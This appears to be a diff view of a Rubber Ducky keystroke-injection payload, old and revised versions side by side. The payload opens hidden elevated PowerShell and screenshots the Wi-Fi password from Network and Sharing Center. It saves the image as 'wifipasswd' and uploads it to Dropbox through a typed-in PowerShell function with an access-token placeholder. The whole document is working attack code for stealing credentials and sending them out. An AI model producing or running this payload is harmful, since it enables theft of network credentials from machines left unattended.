GUI r
|
GUI r
|
||||||
DELAY 200
|
|
||||||
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
|
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
ALT Y
|
ALT Y
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
|
||||||
STRING control.exe /name Microsoft.NetworkAndSharingCenter
|
STRING control.exe /name Microsoft.NetworkAndSharingCenter
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
CTRL TAB
|
CTRL TAB
|
||||||
DELAY 1000
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 1000
|
REPEAT 6 SHIFT TAB
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SHIFT TAB
|
|
||||||
DELAY 1000
|
|
||||||
SPACE
|
SPACE
|
||||||
DELAY 2000
|
|
||||||
PRINTSCREEN
|
PRINTSCREEN
|
||||||
DELAY 2000
|
REPEAT 3 ALT F4
|
||||||
ALT F4
|
|
||||||
DELAY 2000
|
|
||||||
ALT F4
|
|
||||||
DELAY 2000
|
|
||||||
ALT F4
|
|
||||||
DELAY 2000
|
|
||||||
|
|
||||||
|
|
||||||
REM STAGE 2
|
REM STAGE 2
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN powershell -windowstyle hidden
|
||||||
STRING powershell -windowstyle hidden
|
STRINGLN mspaint
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
|
||||||
STRING mspaint
|
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
|
||||||
CTRL v
|
CTRL v
|
||||||
DELAY 1000
|
|
||||||
CTRL s
|
CTRL s
|
||||||
DELAY 1000
|
|
||||||
ALT d
|
ALT d
|
||||||
DELAY 1000
|
STRINGLN %USERPROFILE%\Downloads
|
||||||
STRING %USERPROFILE%\Downloads
|
REPEAT 6 TAB
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
|
||||||
STRING wifipasswd
|
STRING wifipasswd
|
||||||
DELAY 1000
|
|
||||||
ALT s
|
ALT s
|
||||||
DELAY 1000
|
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 5000
|
|
||||||
|
|
||||||
|
REM STAGE 3
|
||||||
STAGE 3
|
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN powershell
|
||||||
STRING powershell
|
STRINGLN function DropBox-Upload {
|
||||||
DELAY 200
|
STRINGLN [CmdletBinding()]
|
||||||
ENTER
|
STRINGLN param (
|
||||||
DELAY 2000
|
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||||
|
STRINGLN [Alias("f")]
|
||||||
STRING function DropBox-Upload {
|
STRINGLN [string]$SourceFilePath
|
||||||
|
STRINGLN )
|
||||||
DELAY 500
|
STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
||||||
ENTER
|
STRINGLN "
|
||||||
|
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
|
||||||
STRING [CmdletBinding()]
|
STRINGLN $TargetFilePath="/$outputFile"
|
||||||
DELAY 500
|
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||||
ENTER
|
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
|
||||||
STRING param (
|
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||||
|
STRINGLN $headers.Add("Authorization", $authorization)
|
||||||
DELAY 500
|
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
|
||||||
ENTER
|
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
|
||||||
|
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
STRINGLN }
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING [Alias("f")]
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING [string]$SourceFilePath
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING )
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING "
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $outputFile = Split-Path $SourceFilePath -leaf
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $TargetFilePath="/$outputFile"
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $authorization = "Bearer " + $DropBoxAccessToken
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Authorization", $authorization)
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Dropbox-API-Arg", $arg)
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING $headers.Add("Content-Type", 'application/octet-stream')
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
STRING }
|
|
||||||
DELAY 5000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN %USERPROFILE%\Downloads\
|
||||||
STRING %USERPROFILE%\Downloads\
|
STRINGLN wifipasswd
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING wifipasswd
|
|
||||||
DELAY 1000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
STRINGLN %USERPROFILE%\Downloads\
|
||||||
STRING %USERPROFILE%\Downloads\
|
STRINGLN wifipasswd
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING wifipasswd
|
|
||||||
DELAY 500
|
|
||||||
ALT h
|
ALT h
|
||||||
DELAY 200
|
REPEAT 5 TAB
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 1000
|
|
||||||
CTRL v
|
CTRL v
|
||||||
DELAY 5000
|
STRINGLN | DropBox-Upload
|
||||||
STRING | DropBox-Upload
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
|
||||||
ENTER
|
ENTER
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 100
|
|
||||||
ENTER
|
ENTER
|
Loading…
Reference in New Issue